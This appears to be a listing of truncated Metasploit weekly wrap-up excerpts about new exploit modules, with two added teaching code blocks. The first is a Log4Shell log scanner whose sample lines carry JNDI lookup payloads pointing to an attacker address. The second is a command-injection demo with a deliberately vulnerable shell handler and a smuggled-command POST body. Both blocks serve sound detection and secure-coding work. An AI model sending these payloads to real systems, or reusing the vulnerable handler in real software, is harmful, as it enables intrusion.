Metasploit
Metasploit Weekly Wrap-Up
Zimbra with Postfix LPE (CVE-2022-3569)
This week rbowes [https://github.com/rbowes-r7] added an LPE exploit for Zimbra
with Postfix. The exploit leverages a vulnerability whereby the zimbra user can
run postfix as root, and postfix in turn is capable of executing arbitrary
shell scripts. This can be abused for reliable privilege escalation from the
context of the zimbra service account to root. At the time of writing, this
vulnerability remains unpatched.
Zimbra RCE (CVE-2022-41352)
rbowes [https://github.co
Metasploit Weekly Wrapup
Metasploit Wrap-Up
Remote code execution modules for Spring Cloud Function and pfSense, plus bug fixes for the Windows secrets dump module.
Metasploit
Metasploit Weekly Wrap-Up
Bofloader - Windows Meterpreter Gets Beacon Object File Loader Support
This week brings a new and frequently requested feature to the Windows
Meterpreter, the Beacon Object File loader. This new extension, bofloader,
allows for users to execute Beacon Object Files as written for either Cobalt
Strike or Sliver. This extension was provided by a group effort among community
members kev169 [https://github.com/kev169], GuhnooPlusLinux
[https://twitter.com/GuhnooPlusLinux], R0wdyJoe [https://twitter.c
Metasploit
Metasploit Weekly Wrap-Up
Veritas Backup Exec Agent RCE
This module, kindly provided by c0rs [https://github.com/c0rs], targets the
Veritas Backup Exec Agent in order to gain RCE as the SYSTEM/root user.
The exploit itself is actually a chain of three separate CVEs (CVE-2021-27876,
CVE-2021-27877 and CVE-2021-27878), which only makes it more impressive.
While you're patching, why not take the time to test your backups too?
Hikvision IP Camera user impersonation
This vulnerability has been present in Hikvision products since 20
Metasploit
Metasploit Weekly Wrap-Up
Have you built out that awesome media room?
If your guilty pleasures include using a mobile device to make your home
entertainment system WOW your guests, you might be using Unified Remote
[https://www.unifiedremote.com/]. I hope you are extra cautious about what
devices you let on that WiFi network. A prolific community member h00die
[https://github.com/h00die] added a module this week that uses a recently
published vulnerability from H4RK3NZ0 [https://github.com/H4rk3nz0] to leverage
an unprot
Metasploit
Metasploit Weekly Wrap-Up
BYOS: Bring your own stager
We try hard to make sure we have a great choice of fully-functional payloads to
choose from, but sometimes you might want to “branch” out on your own, and if
that’s the case we’ve got you covered. In an attempt to make Metasploit play
well with others, we’ve introduced a brand new payload type: “custom.” “Custom”
payloads use Metasploit stagers to build a stager that will stage whatever
shellcode you send it.
Got a third-party payload you want to run like Sliver or a
Metasploit
Metasploit Weekly Wrap-Up
Authenticated command injection vulnerability in Cisco ASA-X with FirePOWER
Services
jbaines-r7 [https://github.com/jbaines-r7] added a new module that exploits an
authenticated command injection vulnerability, CVE-2022-20828
[https://attackerkb.com/topics/wfvCFXXw2e/cve-2022-20828?referrer=blog], in Cisco
ASA-X with FirePOWER Services. This vulnerability affects all Cisco ASA
appliances that support the ASA FirePOWER module. Note that, although a patch has
been added to most recent ASA FirePOWER mod
Metasploit
Metasploit Weekly Wrap-Up
ICPR Certificate Management
This week Metasploit has a new ICPR Certificate Management module from Oliver
Lyak [https://github.com/ly4k] and our very own Spencer McIntyre
[https://github.com/zeroSteiner], which can be used to issue certificates
via Active Directory Certificate Services. Issuing certificates is useful in a
few contexts, including persistence, ESC1
[https://posts.specterops.io/certified-pre-owned-d95910965cd2] and as a
primitive necessary for exp
Metasploit
Metasploit Wrap-Up
Zimbra Auth Bypass to Shell
Ron Bowes [https://github.com/rbowes-r7] added an exploit module
[https://github.com/rapid7/metasploit-framework/pull/16922] that targets
multiple versions of Zimbra Collaboration Suite. The module leverages an
authentication bypass (CVE-2022-37042) and a directory traversal vulnerability
(CVE-2022-27925) to gain code execution as the zimbra user. The auth bypass
functionality correctly checks for a valid session; however, the function that
performs the check does not
Metasploit
Metasploit Wrap-Up
Advantech iView NetworkServlet Command Injection
This week Shelby Pace [https://github.com/space-r7] has developed a new exploit
module for CVE-2022-2143
[https://attackerkb.com/topics/XYFOEYsgKa/cve-2022-2143?referrer=blog]. This
module uses an unauthenticated command injection vulnerability to gain remote
code execution against vulnerable versions of Advantech iView software below
5.7.04.6469. The software runs as NT AUTHORITY\SYSTEM, granting the module user
unauthenticated privileged access
Metasploit Weekly Wrapup
Metasploit Weekly Wrap-Up
Putting in the work!
This week we’re extra grateful for the fantastic contributions our community
makes to Metasploit. The Metasploit team landed more than 5 PRs each from Ron
Bowes [https://github.com/rbowes-r7] and bcoles [https://github.com/bcoles],
adding some great new capabilities.
Ron Bowes [https://github.com/rbowes-r7] contributed four new modules targeting
UnRAR, Zimbra, and ManageEngine ADAudit Plus. These modules offer Metasploit
users some excellent new vectors to leverage against
Metasploit
Metasploit Weekly Wrap-Up
Log4Shell in MobileIron Core
Thanks to jbaines-r7 [https://github.com/jbaines-r7] we have yet another
Log4Shell exploit [https://github.com/rapid7/metasploit-framework/pull/16837].
Like the other Log4Shell exploit modules, this one works by sending a
JNDI lookup string that, once logged and resolved by the server, fetches
attacker-controlled content that is deserialized, resulting in
unauthenticated remote code execution as the tomcat user. Vulnerable versions of
MobileIron Core have been reported as exploited
[https://www.mandiant.com/resou
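The Log4Shell modules all hinge on a logged string of the form `${jndi:...}`, and a naive detection that greps for that literal misses the nested-lookup obfuscation (`${${lower:j}ndi:...}`, `${::-j}...`) seen in the wild. The following is an added example, not code from the page, the Metasploit module or MobileIron: it normalizes the obfuscation lookups innermost-first, the way Log4j 2.x resolves them, and then flags the line. The log lines are constructed here for illustration, and only the lookups commonly abused for obfuscation (`lower`, `upper`, `:-` default values) are modelled.

```python
import re

# Constructed sample access-log lines (not from any real server): one benign request,
# one plain probe, and two that hide the "jndi" keyword behind nested lookups.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /mifs/login HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /mifs/login HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - "POST /mifs/j_spring_security_check HTTP/1.1" 302 '
    '"${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/x}"',
]

# An innermost ${...} lookup: its body contains no further '$', '{' or '}'.
_INNER = re.compile(r'\$\{([^${}]*)\}')
# What we are really looking for once the obfuscation has been peeled away.
_JNDI = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)


def _resolve(token: str) -> str:
    """Approximate Log4j's resolution of one innermost lookup body.

    Assumption: modelling lower/upper/default-value lookups is enough for triage;
    anything else (jndi, env, sys, ...) is left untouched so the caller can see it.
    """
    if ':' not in token:
        return '${' + token + '}'
    kind, _, arg = token.partition(':')
    kind = kind.lower()
    if kind == 'lower':
        return arg.lower()
    if kind == 'upper':
        return arg.upper()
    if kind == '' and arg.startswith(':-'):   # ${::-x}  -> default value "x"
        return arg[2:]
    if kind not in ('jndi',) and ':-' in arg:  # ${env:UNSET:-x} -> default "x"
        return arg.split(':-', 1)[1]
    return '${' + token + '}'


def normalize(line: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups innermost-first until nothing obfuscating remains.

    max_rounds bounds the work on adversarial input; a real lookup like ${jndi:...}
    is a fixed point of _resolve, so the loop terminates as soon as it is exposed.
    """
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve(m.group(1)), line)
        if new == line:
            break
        line = new
    return line


def is_log4shell_probe(line: str) -> bool:
    """True when the line, after de-obfuscation, carries a ${jndi:...} lookup."""
    return bool(_JNDI.search(normalize(line)))


def scan(lines):
    """Return the lines that contain a Log4Shell probe."""
    return [l for l in lines if is_log4shell_probe(l)]


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOGS):
        print('PROBE:', normalize(hit))
```

Running the block over the constructed lines reports three probes and leaves the benign request alone; the normalized form of each hit shows the `ldap://` or `rmi://` callback address, which is the indicator to pivot on when hunting for the attacker's listener in egress logs.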
Metasploit
Metasploit Weekly Wrap-Up
Roxy-WI Unauthenticated RCE
This week, community member Nuri Çilengir [https://github.com/ncilengir] added
an unauthenticated RCE for Roxy-WI. Roxy-WI is an interface for managing
HAProxy, Nginx and Keepalived servers. The vulnerability can be triggered by a
specially crafted POST request to a Python script where the ipbackend parameter
is vulnerable to OS command injection. The result is reliable code execution
within the context of the web application user.
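Both the Advantech iView NetworkServlet bug above and this Roxy-WI bug are OS command injections: a request parameter reaches a shell unescaped. The following is an added example, not Roxy-WI's, Advantech's or the Metasploit module's code. It models the pattern behind such bugs with a hypothetical `ipbackend` handler written two ways, the vulnerable form that interpolates the parameter into a shell string and the hardened form that validates the value as an IP address and passes an argv list with no shell. The POST body is constructed, and `echo` stands in for whatever network command the real script would run; the vulnerable function assumes a POSIX shell, where `;` separates commands.

```python
import ipaddress
import subprocess
from urllib.parse import parse_qs

# Constructed POST body (not a real request): the parameter value is
# "10.0.0.5; echo INJECTED" once URL-decoded.
SAMPLE_POST_BODY = "ipbackend=10.0.0.5%3B+echo+INJECTED"


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body).items()}


def backend_probe_vulnerable(ipbackend: str) -> str:
    """Hypothetical vulnerable handler: user input spliced into a shell command line.

    shell=True hands the whole string to /bin/sh, so ';', '|', '$(...)' and friends
    in ipbackend are interpreted as shell syntax, not as part of the address.
    """
    cmd = f"echo probing {ipbackend}"
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout


def backend_probe_hardened(ipbackend: str) -> str:
    """Hardened handler: strict validation plus no shell.

    ipaddress.ip_address() raises ValueError for anything that is not a bare IPv4/IPv6
    address, which rules out every shell metacharacter. Independently of that, the
    argv list form passes the value as a single argument and never invokes a shell,
    so even a missed validation could not turn the value into extra commands.
    """
    addr = ipaddress.ip_address(ipbackend)
    out = subprocess.run(["echo", "probing", str(addr)], capture_output=True, text=True)
    return out.stdout


def handle_request(body: str, hardened: bool) -> str:
    """Dispatch the parsed ipbackend parameter to one of the two handlers.

    Returns the command output, or an HTTP-style 400 string when validation rejects it.
    """
    params = parse_form(body)
    value = params.get("ipbackend", "")
    if not hardened:
        return backend_probe_vulnerable(value)
    try:
        return backend_probe_hardened(value)
    except ValueError:
        return "400 Bad Request: ipbackend must be an IP address"


if __name__ == "__main__":
    print("vulnerable:", repr(handle_request(SAMPLE_POST_BODY, hardened=False)))
    print("hardened:  ", repr(handle_request(SAMPLE_POST_BODY, hardened=True)))
```

With the constructed body, the vulnerable handler's output contains `INJECTED` on its own line, proof that the second command ran as the web application user; the hardened handler never reaches the command at all. The two defences are deliberately layered: validation is the one that rejects the request, but dropping `shell=True` is the one that would have saved the script had validation been forgotten.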
Fewer Meterpreter Scripts
Community
Metasploit
Metasploit Weekly Wrap-Up
The past, present and future of Metasploit
Don't miss Spencer McIntyre's talk on Help Net Security's blog
[https://www.helpnetsecurity.com/2022/07/20/past-present-future-metasploit-video/].
Spencer is the Lead Security Researcher at Rapid7 and speaks about how
Metasploit has evolved since its creation back in 2003. He also explains how the
Framework is addressing today's offensive security challenges and how important
the partnership with the community is.
LDAP swiss army knife
This week,
Metasploit
Metasploit Weekly Wrap-Up
JBOSS EAP/AS - More Deserializations? Indeed!
Community contributor Heyder Andrade [https://github.com/heyder] added a new
module for a Java deserialization vulnerability in the JBOSS EAP/AS Remoting Unified
Invoker interface for versions 6.1.0 and prior. As far as we can tell this was
first disclosed by Joao Matos [https://github.com/joaomatosf] in his paper at
AlligatorCon
[https://s3.amazonaws.com/files.joaomatosf.com/slides/alligator_slides.pdf].
Later a PoC from Marcio Almeida [https://twit